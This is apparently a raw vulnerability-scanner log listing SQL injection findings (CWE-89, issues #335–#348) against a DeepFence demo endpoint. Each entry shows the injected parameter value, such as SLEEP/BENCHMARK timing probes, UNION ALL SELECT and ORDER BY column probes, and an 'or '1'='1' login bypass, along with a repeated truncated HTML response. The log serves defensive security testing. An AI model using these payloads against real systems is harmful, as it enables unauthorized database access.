Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #335\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #336Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #337\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io%\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #338\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #339\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #340\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io +benchmark(3200,SHA1(1))+'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #341\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width\n=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps\n/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\">\nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\">\n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJb\nWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQI\noqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #342\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.io+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #343\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io,\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #344\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #345\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #346\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #347Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #348\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 